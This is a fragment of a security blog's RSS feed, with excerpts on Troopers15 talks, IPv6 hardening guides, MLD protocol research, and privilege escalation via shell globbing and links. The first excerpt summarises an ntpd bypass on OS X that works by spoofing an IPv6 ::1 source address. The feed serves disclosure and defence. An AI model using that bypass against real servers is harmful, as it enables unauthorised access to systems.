      <description>&lt;p&gt;This is a guest post from &lt;a href=&#34;https://twitter.com/AntoniosAtlasis&#34;&gt;Antonis Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Most of you are probably aware of the recently discovered/-closed severe ntpd vulnerabilities (CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296, see also &lt;a href=&#34;http://support.ntp.org/bin/view/Main/SecurityNotice&#34;&gt;the initial ntp.org security notice&lt;/a&gt;). Some days ago the Project Zero team at Google published a blog post “&lt;a href=&#34;http://googleprojectzero.blogspot.de/2015/01/finding-and-exploiting-ntpd.html&#34;&gt;Finding and exploiting ntpd vulnerabilities&lt;/a&gt;” with additional details. In this one they mentioned a seemingly minor but quite important detail: on a default OS X installation one of the built-in protection mechanisms of ntpd (that is the restriction to process certain packets only if they are sourced on the local machine) can easily be circumvented by sending IPv6 packets with a spoofed source address of ::1 (the equivalent to 127.0.0.1 in IPv4 which would be discarded by the kernel once received from an external source).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some Design Aspects of Hacking Challenges</title>
      <link>https://insinuator.net/2015/01/some-design-aspects-of-hacking-challenges/</link>
      <pubDate>Sun, 04 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/some-design-aspects-of-hacking-challenges/</guid>
      <description>&lt;p&gt;We’re currently starting the preparation for the &lt;a href=&#34;https://www.troopers.de&#34;&gt;Troopers15&lt;/a&gt; &lt;a href=&#34;http://packetwars.com/&#34;&gt;PacketWars Challenge&lt;/a&gt;, and since I’ve participated in quite some CTF games and have been involved in the preparation of a number of PacketWars Battles, I thought I’d write down some thoughts on the design of hacking challenges.&lt;/p&gt;&#xA;&lt;p&gt;First of all, my experience is limited almost exclusively to attack-defend-CTFs or interactive war games (such as &lt;a href=&#34;http://packetwars.com/&#34;&gt;PacketWars&lt;/a&gt; or &lt;a href=&#34;http://en.wikipedia.org/wiki/National_Collegiate_Cyber_Defense_Competition&#34;&gt;CCDC&lt;/a&gt;). While thinking about this blogpost, I also came across several terms which are used, so I decided to give a short summary:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers15 – 5th Round of Talks Selected</title>
      <link>https://insinuator.net/2015/01/troopers15-5th-round-of-talks-selected/</link>
      <pubDate>Sat, 03 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/troopers15-5th-round-of-talks-selected/</guid>
      <description>&lt;p&gt;Happy new year and all the best for 2015 to everybody!&lt;br&gt;&#xA;Here’s the next round of Troopers15 talks (all the others can be found &lt;a href=&#34;http://www.insinuator.net/tag/TR15/&#34;&gt;here&lt;/a&gt;):&lt;/p&gt;&#xA;&lt;p&gt;===&lt;/p&gt;&#xA;&lt;p&gt;Marion Marschalek &amp;amp; Moti Joseph: The Wallstreet of Windows Binaries        &lt;strong&gt;FIRST TIME MATERIAL&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Synopsis&lt;/strong&gt;: Nowadays common ways to find exploitable vulnerabilities include but are not limited to fuzzing, static and dynamic analysis and patch reversing. All common approaches have advantages and limits. Fuzzers tend to only find a limited number of bugs, depending on the sophistication of the fuzzer which is indirectly dependent on the development time invested. Reverse engineering a binary for finding bugs, regardless whether statically or with a debugger, is tedious and requires a lot of time and expertise.&lt;br&gt;&#xA;As we are lazy bastards, we refuse to do all the work by hand and brain. And, as we are greedy bastards, we want a maximum scope of vulnerabilities we can cover and not be limited to what we see from a fuzzers perspective.&lt;br&gt;&#xA;So as you know – in general the lazy greedy bastards have the better ideas. We present you with our idea, which is built after the model of the Wallstreet. We built a tool which weighs the value of a function in a Windows binary as the Wallstreet values a stock; the value telling us the likability of a function to be exploitable.&lt;br&gt;&#xA;The Wallstreet technique works with two different evaluation methods, for once the likability that a function is vulnerable and also the likability that it is exploitable.&lt;br&gt;&#xA;We collect indicators, which help us evaluate that a specific function is potentially vulnerable. Such could be a present memory allocation or conversion function, a lacking sanitization check or a suspicious pattern in the functionname such as ‘create’, ‘convert’ or ‘set’. A combination of these and a handful more indicators lets us calculate what we call the speculation value.&lt;br&gt;&#xA;For the validation of the exploitability we traverse the call tree of a suspicious candidate, to verify its accessibility in an automated way. Only functions which we can influence as an attacker are interesting for us; thus we rate these accessible functions with a price-to-earnings value. Finally putting speculation value and price-to-earnings value in context, we evaluate a function with either ‘buy’ if we believe it comes with an exploitable vulnerability, or with ‘sell’ when we are certain it is not interesting to us. No worries, the presentation will not contain advanced mathematical equations.&lt;br&gt;&#xA;Our tool parses binaries and persists all the gathered information to a database, from where we can retrieve highly suspicious functions in an automated way. Without getting our hands dirty, that is. And because we are lazy bastards who like colors, a lot, we use visuals to make evaluation even easier. The tool is dubbed Wallstreet, free after the most famous stock market on the planet. It is based on Python, C and SQLite and will be released under the WTFPL license (&lt;a href=&#34;http://www.wtfpl.net/)&#34;&gt;http://www.wtfpl.net/)&lt;/a&gt;. Also, there will be demos 😀&lt;br&gt;&#xA;Wrapping it up, this presentation shows an easy to use approach which makes the complicated topic of binary exploitation more accessible. Wallstreet of Windows Binaries provides beginners with better understanding of the challenges and practitioners with a hands-on tool.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Telco Research 2015</title>
      <link>https://insinuator.net/2015/01/telco-research-2015/</link>
      <pubDate>Fri, 02 Jan 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/01/telco-research-2015/</guid>
      <description>&lt;p&gt;Hello and a happy new year 2015 to everybody!&lt;/p&gt;&#xA;&lt;p&gt;As follow up of our 2014 talk &lt;a href=&#34;http://www.insinuator.net/2014/10/lte-vs-darwin-hackers-to-hackers-conference-11/&#34;&gt;“LTE vs. Darwin&lt;/a&gt;” I want to inform you about our telco research in 2015. We are currently dealing with the so called IP Multimedia Subsystem (IMS), which handles the call and media logic of 4G telecommunication networks. This network part provides functions like VoIP (or VoLTE) and takes care of the interconnection to other call or media related networks.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Hardening Against Local PrivEsc: Protecting Your Links</title>
      <link>https://insinuator.net/2014/12/hardening-against-local-privesc-protecting-your-links/</link>
      <pubDate>Tue, 30 Dec 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/12/hardening-against-local-privesc-protecting-your-links/</guid>
      <description>&lt;p&gt;Following up on &lt;a href=&#34;https://www.insinuator.net/2014/12/revisiting-an-old-friend-shell-globbing/&#34;&gt;this post&lt;/a&gt;, we want to provide some details on &lt;a href=&#34;http://www.openwall.com/lists/kernel-hardening/2012/01/07/1&#34;&gt;two rather new&lt;/a&gt; (well, compared to its lifespan) Linux kernel parameters — and emphasize the need to enable those:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;fs.protected_hardlinks&lt;/li&gt;&#xA;&lt;li&gt;fs.protected_symlinks&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;For BSD, similar parameters for hardlinks exist: security.bsd.hardlink_check_uid/security.bsd.hardlink_check_gid.&lt;/p&gt;&#xA;&lt;p&gt;Those parameters control whether users are allowed to create links pointing to files which are not owned by them. If &lt;em&gt;fs.protected_hardlinks/symlinks&lt;/em&gt; is set to &lt;em&gt;1&lt;/em&gt;, users can only create links to files which they own. Attackers have used this possibility for a long time, and here are some sample attack scenarios:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers15 – Fourth Round of Talks Selected</title>
      <link>https://insinuator.net/2014/12/troopers15-fourth-round-of-talks-selected/</link>
      <pubDate>Mon, 29 Dec 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/12/troopers15-fourth-round-of-talks-selected/</guid>
      <description>&lt;p&gt;As we promised some days ago here’s the fourth round of Troopers15 talks (the first three can be found &lt;a href=&#34;http://www.insinuator.net/tag/tr15/&#34;&gt;here&lt;/a&gt;). We really can’t wait for the con ourselves 😉 !&lt;/p&gt;&#xA;&lt;p&gt;Arrigo Triulzi: Pneumonia, Shardan, Antibiotics and Nasty MOV: a Dead Hand’s Tale&lt;br&gt;&#xA;&lt;strong&gt;FIRST TIME MATERIAL&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Synopsis: Starting in the 80’s we will discuss the influence of nuclear weapons on the design of an ITsec “Dead Hand” system for a security practitioner, how it merged with research into firmware backdoors and microcode modification and finally triggered when instead of enjoying Summer pneumonia struck unannounced, or rather, announced by the Dead Hand via Twitter.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Revisiting an Old Friend: Shell Globbing</title>
      <link>https://insinuator.net/2014/12/revisiting-an-old-friend-shell-globbing/</link>
      <pubDate>Tue, 23 Dec 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/12/revisiting-an-old-friend-shell-globbing/</guid>
      <description>&lt;p&gt;One interesting observation we make when testing complex environments is that at the bottom of huge technology stacks, there is usually a handful of shell scripts doing interesting stuff. More often than not these helper scripts are started as part of cron jobs running as root and perform basic administrative tasks like compressing and copying log files or deleting leftover files in temporary directories. Of course, these high privileges make them an interesting target for privilege escalation attacks and one class of vulnerability we reliably encounter in shell scripts is unsafe handling of globbing or filename expansions.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Hardening Guide for Windows Servers</title>
      <link>https://insinuator.net/2014/12/ipv6-hardening-guide-for-windows-servers/</link>
      <pubDate>Mon, 22 Dec 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/12/ipv6-hardening-guide-for-windows-servers/</guid>
      <description>&lt;p&gt;After we recently released the “&lt;a href=&#34;http://www.insinuator.net/2014/12/ipv6-hardening-guide-for-linux-servers/&#34;&gt;Linux IPv6 Hardening Guide&lt;/a&gt;” we got a number of suggestions “could you pls provide a similar document for $OS?” (btw: thanks to you all for the overwhelming interest in the Linux document and the active discussion of ip6tables rule approaches on the &lt;a href=&#34;http://lists.si6networks.com/listinfo/ipv6hackers/&#34;&gt;&lt;em&gt;ipv6hackers&lt;/em&gt; mailing list&lt;/a&gt;).&lt;/p&gt;&#xA;&lt;p&gt;Hence Antonios thankfully decided to put together a list of configuration steps for Windows servers. It &lt;a href=&#34;https://www.ernw.de/download/ERNW_Guide_to_Configure_Securely_Windows_Servers_For_IPv6_v1_0.pdf&#34;&gt;can be found here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Once more we’d like to emphasize that the approach described is only suited for very specific environments with high security requirements and an associated ratio of “generous operational resources”. From our perspective this guide is intended mostly to serve as a source of inspiration (“what could be done”) and for documentation purposes (“how to do it”). Everything described should be carefully tested in your specific environment.&lt;br&gt;&#xA;For example, we were recently involved in IPv6 security planning in an organization where the Windows guys (completely legitimately) came up with a stance of “before we fully accept and ratify the strategy and policy just discussed, we’d like to get feedback from Microsoft, if we still have full support once we follow this path”.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers15 – Third Round of Talks Selected</title>
      <link>https://insinuator.net/2014/12/troopers15-third-round-of-talks-selected/</link>
      <pubDate>Sat, 20 Dec 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/12/troopers15-third-round-of-talks-selected/</guid>
      <description>&lt;p&gt;As we promised some days ago here’s the third round of Troopers15 speakers (first one &lt;a href=&#34;http://www.insinuator.net/2014/11/troopers15-first-round-of-talks-selected/&#34;&gt;here&lt;/a&gt;, second &lt;a href=&#34;http://www.insinuator.net/2014/12/troopers15-second-round-of-talks-selected/&#34;&gt;here&lt;/a&gt;). It’s going to be awesome!&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://3vildata.tumblr.com/&#34;&gt;Andreas Lindh&lt;/a&gt;: Defender Economics         &lt;strong&gt;FIRST TIME MATERIAL&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Synopsis: There are a lot of preconceptions about defense, the most prevalent one probably the “defenders dilemma” in which it is stated that an attacker only needs to find one weakness to compromise a network while a defender needs to defend all of them. While this may be true in a technical sense, things become a lot more complicated once you apply real world considerations. Preconceptions like this are often the foundation on which risk management and ultimately defense strategies are based, something that has led to a number of false but generally accepted assumptions about attackers and their capabilities, and how to defend against them.&lt;br&gt;&#xA;This talk will discuss the capabilities, and more importantly the limitations, of different types of attackers. Using the ancient wisdom of the Teenage Mutant Ninja Turtles, the speaker will explain how knowledge of an attacker’s limitations can be leveraged to raise the cost of attack, something that will tip the scale in the defenders favor. The speaker will also explain how different defensive measures will affect different types of attackers, how they are likely to react to them, and in the end how to get them to hopefully move on to another target.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Getting 20k Inline-QR-Codes out of Burp</title>
      <link>https://insinuator.net/2014/12/getting-20k-inline-qr-codes-out-of-burp/</link>
      <pubDate>Fri, 19 Dec 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/12/getting-20k-inline-qr-codes-out-of-burp/</guid>
      <description>&lt;p&gt;Lately we had to analyze QR-Codes in a pentest. Those held some random data which was used as a token for login and we wanted to know if that data was really random.&lt;/p&gt;&#xA;&lt;p&gt;If you ever worked with the Burp Suite you may know the Burp Sequencer, which offers some statistical analysis regarding the randomness of tokens which appear in requests (you just have to tell Burp what or where the token is). In our case the QR-Code was delivered as an inline-image in HTML to the browser, like this:&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Hardening Guide for Linux Servers</title>
      <link>https://insinuator.net/2014/12/ipv6-hardening-guide-for-linux-servers/</link>
      <pubDate>Wed, 17 Dec 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/12/ipv6-hardening-guide-for-linux-servers/</guid>
      <description>&lt;p&gt;We were recently approached by a customer asking us for support along the lines of “do you have any recommendations as for strict hardening of IPv6 parameters on Linux systems?”. It turned out that the systems in question process quite sensitive data and are located in certain, not too big network segments with very high security requirements.&lt;/p&gt;&#xA;&lt;p&gt;They indicated they were willing to spend significant operational resources on “securely configuring them”. So Antonios deciced to write a small hardening guide for IPv6 on Linux, mostly focusing on manual configuration of pretty much everything (including neighbor cache entries 😉 with accompanying deactivation of all automatic mechanisms, together with ip6tables based local packet filtering.&lt;br&gt;&#xA;The document &lt;a href=&#34;https://www.ernw.de/download/ERNW_Guide_to_Securely_Configure_Linux_Servers_For_IPv6_v1_0.pdf&#34;&gt;can be found here&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Penetration Testing Tools that (do not) Support IPv6</title>
      <link>https://insinuator.net/2014/12/penetration-testing-tools-that-do-not-support-ipv6/</link>
      <pubDate>Thu, 11 Dec 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/12/penetration-testing-tools-that-do-not-support-ipv6/</guid>
      <description>&lt;p&gt;We just released a white paper authored by &lt;a href=&#34;https://twitter.com/AntoniosAtlasis&#34;&gt;Antonios Atlasis&lt;/a&gt; that provides an overview which pentesting tools currently support IPv6 and how to (still) use them if that’s not the case. It can be found &lt;a href=&#34;https://www.ernw.de/category/newsletter/index.html&#34;&gt;in our newsletter section&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Best&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers15 – Second Round of Talks Selected</title>
      <link>https://insinuator.net/2014/12/troopers15-second-round-of-talks-selected/</link>
      <pubDate>Fri, 05 Dec 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/12/troopers15-second-round-of-talks-selected/</guid>
      <description>&lt;p&gt;As we promised some days ago when we &lt;a href=&#34;http://www.insinuator.net/2014/11/troopers15-first-round-of-talks-selected/&#34;&gt;published the first round&lt;/a&gt;, here we go with the second:&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://twitter.com/michaelossmann&#34;&gt;Mike Ossmann&lt;/a&gt;: RF Retroreflectors, Emission Security and SDR&lt;/p&gt;&#xA;&lt;p&gt;Synopsis: The leaked pages from the NSA ANT catalog provided a glimpse into the modern world of emission security. Extending beyond passive monitoring of unintentional emissions, today’s spooks employ active attacks with tools such as RF retroreflectors. I’ll report on my experiments to reproduce such techniques with open source hardware and software, primarily using SDR.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Implications of Using IPv6 GUAs Only</title>
      <link>https://insinuator.net/2014/12/security-implications-of-using-ipv6-guas-only/</link>
      <pubDate>Mon, 01 Dec 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/12/security-implications-of-using-ipv6-guas-only/</guid>
      <description>&lt;p&gt;When planning for IPv6 addressing, many organizations – rightfully &amp;amp; wisely – decide to go with &lt;em&gt;global unicast addresses&lt;/em&gt; (GUAs) only (hence not to use &lt;em&gt;unique local addresses&lt;/em&gt;/ULAs as of &lt;a href=&#34;https://tools.ietf.org/rfc/rfc4193.txt&#34;&gt;RFC 4193&lt;/a&gt; at all), in order to avoid &lt;em&gt;address selection hell&lt;/em&gt; or just for &lt;a href=&#34;https://www.ietf.org/rfc/rfc3439.txt&#34;&gt;simplicity&lt;/a&gt; &amp;amp; consistency reasons. This post discusses security implications and complementary security controls of such an approach.&lt;/p&gt;&#xA;&lt;p&gt;In their IPv4 networks, most of these organizations currently use RFC 1918 space, combined with NAT for specific connections or use cases. Ideally NAT is only in place “where strictly needed”, in practice it’s often used as a &lt;a href=&#34;http://blog.ipspace.net/2013/09/sooner-or-later-someone-will-pay-for.html&#34;&gt;kludge&lt;/a&gt; to conceal of all types of bad network design or debatable application architectures. I won’t enter the “is NAT a security control?” debate here, one statement might be allowed though: as of section 3 (“Because private addresses have no global meaning, routing information about private networks shall not be propagated on inter-enterprise links, and packets with private source or destination addresses should not be forwarded across such links.”) &lt;a href=&#34;https://tools.ietf.org/rfc/rfc1918.txt&#34;&gt;RFC 1918&lt;/a&gt; space is usually not reachable from the Internet. So using such address space for internal networks is a nice example of the &lt;em&gt;isolation principle&lt;/em&gt; as of the “&lt;a href=&#34;http://www.insinuator.net/2012/03/applying-the-ernw-seven-sisters-approach-to-voip-networks-applying-the-ernw-seven-sisters-approach-to-telco-networks/&#34;&gt;Seven Sisters&lt;/a&gt;” approach we like to use. Now, bringing NAT into these networks &lt;strong&gt;enables&lt;/strong&gt; connections (usually between trusted and untrusted networks) which simply would not be possible without it [NAT], so this &lt;strong&gt;actually breaks the isolation property&lt;/strong&gt;. Question: how can one ever call something that &lt;strong&gt;increases&lt;/strong&gt; the number of possible interactions between assets and potential attack originators a ‘security control’?!&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 in RFIs/Tendering Processes</title>
      <link>https://insinuator.net/2014/11/ipv6-in-rfis/tendering-processes/</link>
      <pubDate>Fri, 28 Nov 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/11/ipv6-in-rfis/tendering-processes/</guid>
      <description>&lt;p&gt;In one of our customer environments each vendor offering an IT product/solution is asked to fill out a questionnaire collecting information on a number of technical parameters with regard to their product[s]. We were recently asked to come up with a proposal of 8 to 10 IPv6-related questions to be added to the questionnaire/process. Here’s what we suggested:&lt;/p&gt;&#xA;&lt;p&gt;When displaying, storing or exporting IP addresses, can your solution correctly handle IPv6 addresses of all types (link-local, ULAs, GUAs)?&lt;br&gt;&#xA;When receiving IP addresses as input or processing them (e.g. in a database), can your solution correctly handle IPv6 addresses of all types (link-local, ULAs, GUAs) and of variable length?&lt;br&gt;&#xA;Does your solution implement RFC 5952 in the sense that input (of IPv6 addresses) can be in any format, but output (e.g. in log files) follows the RFC 5952 recommendation?&lt;br&gt;&#xA;Can your solution handle both A and AAAA records from DNS?&lt;br&gt;&#xA;Does your solution use link-local or GUAs/ULAs for intra-subnet communication? Which is the default and can both types of addresses be configured?&lt;br&gt;&#xA;Does your product/offering comply with any of the profiles in the ripe-554 requirements specification?&lt;br&gt;&#xA;[http://www.ripe.net/ripe/docs/ripe-554]&lt;br&gt;&#xA;Do all security-related functions of your solution (e.g. traffic filtering/ACLs, blacklisting, logging) fully support IPv6, with performance being equal to that of IPv4?&lt;br&gt;&#xA;Do all implementations of management interfaces &amp;amp; protocols (SNMP, syslog etc.) used within your solution fully support IPv6?&lt;br&gt;&#xA;Does your solution have a built-in webserver? Can this be configured to listen on an IPv6 address and has it been tested to successfully work in an IPv6-only or dual-stack setting?&lt;br&gt;&#xA;Has your solution been thoroughly tested in an IPv6 only or in a dual-stack setting? Please provide proper test documentation.&lt;br&gt;&#xA;In dual-stack settings which approach (e.g. Happy Eyeballs as of RFC 6555) does your solution follow as for preferring IPv6 over IPv4 or vice versa? Can this be configured/adjusted if needed?&lt;/p&gt;</description>
    </item>
    <item>
      <title>MLD Considered Harmful?</title>
      <link>https://insinuator.net/2014/11/mld-considered-harmful/</link>
      <pubDate>Thu, 27 Nov 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/11/mld-considered-harmful/</guid>
      <description>&lt;p&gt;This is a guest post from &lt;a href=&#34;https://twitter.com/AntoniosAtlasis&#34;&gt;Antonios Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;On Thursday the 20^(th) Enno, Jayson and I had the pleasure to present our latest research results  regarding MLD at &lt;a href=&#34;http://www.deepsec.net/speaker.html#PSLOT153&#34;&gt;Deepsec 2014&lt;/a&gt;, both from vendors’ implementation perspective as well as regarding protocol design flaws (some preliminary results as well as our testing methodology were discussed &lt;a href=&#34;http://www.insinuator.net/2014/11/mld-to-be-reconsidered/&#34;&gt;here&lt;/a&gt; and &lt;a href=&#34;http://www.insinuator.net/2014/11/protocol-properties-attack-vectors/&#34;&gt;here&lt;/a&gt;).&lt;/p&gt;&#xA;&lt;p&gt;For refreshing out memory, in a nutshell, the purpose of MLD, a subprotocol of IPv6, is to inform routers about the presence of nodes which are interested in receiving specific multicast traffic (&lt;a href=&#34;http://tools.ietf.org/html/rfc2710&#34;&gt;RFC 2710&lt;/a&gt;). The newer version of MLD, MLDv2 adds the ability for source address selection (&lt;a href=&#34;http://tools.ietf.org/html/rfc3810&#34;&gt;RFC 3810&lt;/a&gt;).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Scal(e)ing down Privacy</title>
      <link>https://insinuator.net/2014/11/scaleing-down-privacy/</link>
      <pubDate>Sat, 22 Nov 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/11/scaleing-down-privacy/</guid>
      <description>&lt;p&gt;As you might know we are continuously doing &lt;a href=&#34;http://www.insinuator.net/2013/11/medical-device-security/&#34; title=&#34;Medical Devices&#34;&gt;research on medical devices&lt;/a&gt;. I presented some of the new results at &lt;a href=&#34;http://www.powerofcommunity.net/index.html&#34; title=&#34;Power of Community 2014&#34;&gt;Power of Community 2014&lt;/a&gt; last week and we thought we would share some of the details with you here. The focus of the previous work was testing medical devices that are used in hospitals like patient monitors, syringe pumps or even MRIs. This time we looked at a device that every user can use at home and which is available to anyone on the market: A smart scale.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers15 – First Round of Talks Selected</title>
      <link>https://insinuator.net/2014/11/troopers15-first-round-of-talks-selected/</link>
      <pubDate>Sat, 22 Nov 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/11/troopers15-first-round-of-talks-selected/</guid>
      <description>&lt;p&gt;We’re delighted to provide the first announcement of talks of next year’s &lt;a href=&#34;https://www.troopers.de/&#34;&gt;Troopers&lt;/a&gt; edition. Looks like it’s going to be a great event again &lt;img src=&#34;http://www.insinuator.net/wp-includes/images/smilies/icon_wink.gif&#34; alt=&#34;;-)&#34;&gt;.&lt;br&gt;&#xA;Here we go:&lt;/p&gt;&#xA;&lt;p&gt;Jacob Torrey – The foundation is rotting and the basement is flooding: A deeper look at the implicit trust relationships in your organization        &lt;strong&gt;FIRST TIME MATERIAL&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Synopsis: In this session, a new hardware-level attack on PCIe is presented as an example for the implicit trust your organization places in 3rd parties. These implicit trust relationships that are typically overlooked will be closely examined under the lens of “InfoSec debt” and providing guidance to InfoSec decision makers on the ROI or risks of adding additional IT services/appliances to an organization’s network.&lt;br&gt;&#xA;The “InfoSec debt” metric can then be tracked over time and provides an intuitive way to explain the cost/benefits of IT security to other organizational stakeholders.&lt;/p&gt;</description>
    </item>
    <item>
      <title>GitHub Enterprise 2.0.0 Fixes Multiple Vulnerabilities</title>
      <link>https://insinuator.net/2014/11/github-enterprise-2.0.0-fixes-multiple-vulnerabilities/</link>
      <pubDate>Mon, 17 Nov 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/11/github-enterprise-2.0.0-fixes-multiple-vulnerabilities/</guid>
      <description>&lt;p&gt;Recently we had the pleasure to take a look at GitHub’s Enterprise appliance. The appliance allows one to deploy the excellent GitHub web interface locally to host code on-site. Besides the well known interface, which is similar to the one hosted at &lt;a href=&#34;https://github.com/&#34;&gt;github.com&lt;/a&gt;, the appliance ships with a separate interface called the management console, which is used for administrative tasks like the configuration of the appliance itself. This management interface is completely decoupled from the user interface.&lt;/p&gt;</description>
    </item>
    <item>
      <title>MLD to Be Reconsidered?</title>
      <link>https://insinuator.net/2014/11/mld-to-be-reconsidered/</link>
      <pubDate>Fri, 14 Nov 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/11/mld-to-be-reconsidered/</guid>
      <description>&lt;p&gt;This is guest post from &lt;a href=&#34;https://twitter.com/AntoniosAtlasis&#34;&gt;Antonios Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Following my September post about the connection between &lt;a href=&#34;http://www.insinuator.net/2014/09/mld-and-neighbor-discovery-are-they-related/&#34;&gt;MLD and Neighbor Discovery&lt;/a&gt;, as well as &lt;a href=&#34;http://www.insinuator.net/2014/11/protocol-properties-attack-vectors/&#34;&gt;Enno’s introduction&lt;/a&gt; about our &lt;a href=&#34;http://www.deepsec.net/speaker.html#PSLOT153&#34;&gt;upcoming talk at DeepSec&lt;/a&gt;, I would like to try to enlighten you about this with some technical details. First, we have some facts:&lt;/p&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;MLD is pre-enabled in most modern Operating Systems.&lt;/li&gt;&#xA;&lt;li&gt;MLD traffic is sent out-of the-box during the stack initialization, as well as periodically.&lt;/li&gt;&#xA;&lt;li&gt;They also interact with/respond to MLD Queries without any further configuration.&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;p&gt;To run the tests, first we wrote down all potential security issues that may arise by (ab)using MLD, starting from the simple ones, like:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Power of Community 2014</title>
      <link>https://insinuator.net/2014/11/power-of-community-2014/</link>
      <pubDate>Thu, 13 Nov 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/11/power-of-community-2014/</guid>
      <description>&lt;p&gt;I had the pleasure to participate in this year’s &lt;a href=&#34;http://www.powerofcommunity.net/index.html&#34; title=&#34;Power of Community 2014&#34;&gt;Power of Community&lt;/a&gt; and was invited to talk about the insecurity of medical devices. The conference is based in Seoul, Korea and started in 2006. It has a strong technical focus and it is a community driven event. For me it was great to participate as mostly hackers from Asia were there and I got the chance to talk to a lot of nice folks that I wouldn’t be able to meet otherwise. This is especially true for the host, vangelis.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Protocol Properties &amp; Attack Vectors</title>
      <link>https://insinuator.net/2014/11/protocol-properties-attack-vectors/</link>
      <pubDate>Thu, 13 Nov 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/11/protocol-properties-attack-vectors/</guid>
      <description>&lt;p&gt;Next week, at &lt;a href=&#34;http://www.deepsec.net/&#34;&gt;DeepSec&lt;/a&gt;, we’re going to give a &lt;a href=&#34;http://www.deepsec.net/speaker.html#PSLOT153&#34;&gt;talk about Multicast Listener Discovery&lt;/a&gt; (MLD), a component of IPv6 which is realized by means of ICMPv6 messages. There are two versions of MLD (mainly specified in RFC 2710 and RFC 3810 respectively) and while MLD is technically implemented by ICMPv6 exchanges, these specifications describe a whole set of rules and communication formats, hence we can safely talk about “the MLD protocol”.&lt;/p&gt;&#xA;&lt;p&gt;Now, you might ask: how does one tackle the task of examining the security “of a protocol”?&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dynamics of IPv6 Prefixes within the LIR Scope in the RIPE NCC Region</title>
      <link>https://insinuator.net/2014/11/dynamics-of-ipv6-prefixes-within-the-lir-scope-in-the-ripe-ncc-region/</link>
      <pubDate>Thu, 06 Nov 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/11/dynamics-of-ipv6-prefixes-within-the-lir-scope-in-the-ripe-ncc-region/</guid>
      <description>&lt;p&gt;To contribute to the &lt;a href=&#34;http://www.insinuator.net/2014/10/deaggregation-by-large-organizations/&#34;&gt;current debate&lt;/a&gt; on IPv6 route deaggregation &amp;amp; “strict-filtering” performed by certain ISPs we just released a white paper on “&lt;a href=&#34;https://www.ernw.de/newsletter/newsletter-44-november-2014-dynamics-of-ipv6-prefixes-within-the-lir-scope-in-the-ripe-ncc-region/index.html&#34;&gt;Dynamics of IPv6 Prefixes within the LIR Scope in the RIPE NCC Region&lt;/a&gt;“. I will give a &lt;a href=&#34;https://ripe69.ripe.net/wp-content/uploads/presentations/137-RIPE69_Langner_Rey_Schaetzle_Slash48_Considered_Harmful.pdf&#34;&gt;talk&lt;/a&gt; on the overall topic later today at the &lt;em&gt;Routing Working Group&lt;/em&gt;. We sincerely hope that the IPv6 community becomes aware of the inherent issues, and that practical solutions can be found which consider &amp;amp; meet the needs of the different parties involved.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 for IPv4 Experts</title>
      <link>https://insinuator.net/2014/11/ipv6-for-ipv4-experts/</link>
      <pubDate>Tue, 04 Nov 2014 00:00:00 +0000</pubDate>
